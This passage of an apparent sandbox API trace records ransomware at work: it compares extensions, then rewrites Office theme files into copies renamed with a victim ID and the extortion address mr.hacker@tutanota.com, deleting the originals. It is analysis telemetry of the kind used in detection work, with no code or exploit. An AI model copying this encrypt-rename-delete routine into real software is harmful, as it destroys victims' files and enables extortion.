(lpString1=".rar", lpString2=".MID") returned 1 [0269.881] lstrlenW (lpString=".bz2") returned 4 [0269.881] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.881] lstrlenW (lpString=".7z") returned 3 [0269.881] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.881] lstrlenW (lpString=".dbf") returned 4 [0269.881] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.881] lstrlenW (lpString=".1cd") returned 4 [0269.881] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0269.881] lstrlenW (lpString=".jpg") returned 4 [0269.881] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.881] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0269.881] lstrlenW (lpString="Civic.eftx") returned 10 [0269.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.152] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=42917) returned 1 [0270.152] CloseHandle (hObject=0x390) returned 1 [0270.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx")) returned 0x20 [0270.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.169] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.169] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.277] GetLastError () returned 0x0 [0270.277] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0xa7a5, lpOverlapped=0x0) returned 1 [0270.279] WriteFile (in: hFile=0x3b0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xa7b0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xa7b0, lpOverlapped=0x0) returned 1 [0270.282] ReadFile (in: hFile=0x348, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.282] WriteFile (in: hFile=0x3b0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0270.282] SetEndOfFile (hFile=0x3b0) returned 1 [0270.282] CloseHandle (hObject=0x3b0) returned 1 [0270.282] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.282] SetEndOfFile (hFile=0x348) returned 1 [0270.285] CloseHandle (hObject=0x348) returned 1 [0270.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.378] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx")) returned 1 [0270.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.378] lstrlenW (lpString=".doc") returned 4 [0270.378] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.378] lstrlenW (lpString=".docx") returned 5 [0270.378] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.378] lstrlenW (lpString=".pdf") returned 4 [0270.378] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.378] lstrlenW (lpString=".xls") returned 4 [0270.378] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.378] lstrlenW (lpString=".xlsx") returned 5 [0270.378] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.379] lstrlenW (lpString=".ppt") returned 4 [0270.379] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.379] lstrlenW (lpString=".zip") returned 4 [0270.379] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.379] lstrlenW (lpString=".rar") returned 4 [0270.379] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.379] lstrlenW (lpString=".bz2") returned 4 [0270.379] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.379] lstrlenW (lpString=".7z") returned 3 [0270.379] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.379] lstrlenW (lpString=".dbf") returned 4 [0270.379] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.379] lstrlenW (lpString=".1cd") returned 4 [0270.379] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.379] lstrlenW (lpString=".jpg") returned 4 [0270.379] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.379] lstrlenW (lpString=".doc") returned 4 [0270.379] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.379] lstrlenW (lpString=".docx") returned 5 [0270.379] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.379] lstrlenW (lpString=".pdf") returned 4 [0270.379] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.380] lstrlenW (lpString=".xls") returned 4 [0270.380] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.380] lstrlenW (lpString=".xlsx") returned 5 [0270.380] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.380] lstrlenW (lpString=".ppt") returned 4 [0270.380] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.380] lstrlenW (lpString=".zip") returned 4 [0270.380] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.380] lstrlenW (lpString=".rar") returned 4 [0270.380] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.380] lstrlenW (lpString=".bz2") returned 4 [0270.380] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.380] lstrlenW (lpString=".7z") returned 3 [0270.380] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.380] lstrlenW (lpString=".dbf") returned 4 [0270.380] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.380] lstrlenW (lpString=".1cd") returned 4 [0270.380] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0270.380] lstrlenW (lpString=".jpg") returned 4 [0270.380] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.380] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.380] lstrlenW (lpString="Foundry.eftx") returned 12 [0270.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.736] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=18226) returned 1 [0270.736] CloseHandle (hObject=0x328) returned 1 [0270.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx")) returned 0x20 [0270.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.740] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.740] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.741] GetLastError () returned 0x0 [0270.741] ReadFile (in: hFile=0x394, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x4732, lpOverlapped=0x0) returned 1 [0270.742] WriteFile (in: hFile=0x384, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x4740, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x4740, lpOverlapped=0x0) returned 1 [0270.743] ReadFile (in: hFile=0x394, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.743] WriteFile (in: hFile=0x384, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.743] SetEndOfFile (hFile=0x384) returned 1 [0270.743] CloseHandle (hObject=0x384) returned 1 [0270.744] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.744] SetEndOfFile (hFile=0x394) returned 1 [0270.746] CloseHandle (hObject=0x394) returned 1 [0270.746] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.747] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx")) returned 1 [0270.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.747] lstrlenW (lpString=".doc") returned 4 [0270.747] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.747] lstrlenW (lpString=".docx") returned 5 [0270.747] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.747] lstrlenW (lpString=".pdf") returned 4 [0270.747] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.747] lstrlenW (lpString=".xls") returned 4 [0270.747] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.747] lstrlenW (lpString=".xlsx") returned 5 [0270.747] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.747] lstrlenW (lpString=".ppt") returned 4 [0270.747] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.747] lstrlenW (lpString=".zip") returned 4 [0270.747] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.748] lstrlenW (lpString=".rar") returned 4 [0270.748] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.748] lstrlenW (lpString=".bz2") returned 4 [0270.748] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.748] lstrlenW (lpString=".7z") returned 3 [0270.748] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.748] lstrlenW (lpString=".dbf") returned 4 [0270.748] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.748] lstrlenW (lpString=".1cd") returned 4 [0270.748] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.748] lstrlenW (lpString=".jpg") returned 4 [0270.748] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.748] lstrlenW (lpString=".doc") returned 4 [0270.748] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.748] lstrlenW (lpString=".docx") returned 5 [0270.748] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.748] lstrlenW (lpString=".pdf") returned 4 [0270.748] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.748] lstrlenW (lpString=".xls") returned 4 [0270.748] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.749] lstrlenW (lpString=".xlsx") returned 5 [0270.749] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.749] lstrlenW (lpString=".ppt") returned 4 [0270.749] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.749] lstrlenW (lpString=".zip") returned 4 [0270.749] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.749] lstrlenW (lpString=".rar") returned 4 [0270.749] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.749] lstrlenW (lpString=".bz2") returned 4 [0270.749] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.749] lstrlenW (lpString=".7z") returned 3 [0270.749] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.749] lstrlenW (lpString=".dbf") returned 4 [0270.749] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.749] lstrlenW (lpString=".1cd") returned 4 [0270.749] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79 [0270.749] lstrlenW (lpString=".jpg") returned 4 [0270.749] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.749] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0270.749] lstrlenW (lpString="Grid.eftx") returned 9 [0270.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.750] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=18639) returned 1 [0270.750] CloseHandle (hObject=0x394) returned 1 [0270.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx")) returned 0x20 [0270.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0270.751] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.751] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.751] GetLastError () returned 0x0 [0270.751] ReadFile (in: hFile=0x394, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x48cf, lpOverlapped=0x0) returned 1 [0270.753] WriteFile (in: hFile=0x384, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x48d0, lpOverlapped=0x0) returned 1 [0270.757] ReadFile (in: hFile=0x394, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.757] WriteFile (in: hFile=0x384, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0270.757] SetEndOfFile (hFile=0x384) returned 1 [0270.757] CloseHandle (hObject=0x384) returned 1 [0270.757] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.757] SetEndOfFile (hFile=0x394) returned 1 [0270.760] CloseHandle (hObject=0x394) returned 1 [0270.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.761] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx")) returned 1 [0270.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.762] lstrlenW (lpString=".doc") returned 4 [0270.762] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.762] lstrlenW (lpString=".docx") returned 5 [0270.762] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.762] lstrlenW (lpString=".pdf") returned 4 [0270.762] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.762] lstrlenW (lpString=".xls") returned 4 [0270.762] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.762] lstrlenW (lpString=".xlsx") returned 5 [0270.762] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.762] lstrlenW (lpString=".ppt") returned 4 [0270.762] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.762] lstrlenW (lpString=".zip") returned 4 [0270.762] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.762] lstrlenW (lpString=".rar") returned 4 [0270.762] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.762] lstrlenW (lpString=".bz2") returned 4 [0270.762] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.762] lstrlenW (lpString=".7z") returned 3 [0270.762] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.762] lstrlenW (lpString=".dbf") returned 4 [0270.762] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.763] lstrlenW (lpString=".1cd") returned 4 [0270.763] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.763] lstrlenW (lpString=".jpg") returned 4 [0270.763] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.763] lstrlenW (lpString=".doc") returned 4 [0270.763] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString=".docx") returned 5 [0270.763] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0270.763] lstrlenW (lpString=".pdf") returned 4 [0270.763] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString=".xls") returned 4 [0270.763] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString=".xlsx") returned 5 [0270.763] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0270.763] lstrlenW (lpString=".ppt") returned 4 [0270.763] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.763] lstrlenW (lpString=".zip") returned 4 [0270.763] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString=".rar") returned 4 [0270.763] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString=".bz2") returned 4 [0270.763] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0270.763] lstrlenW (lpString=".7z") returned 3 [0270.763] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0270.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.764] lstrlenW (lpString=".dbf") returned 4 [0270.764] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0270.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.764] lstrlenW (lpString=".1cd") returned 4 [0270.764] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0270.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0270.764] lstrlenW (lpString=".jpg") returned 4 [0270.764] lstrcmpiW (lpString1=".jpg", 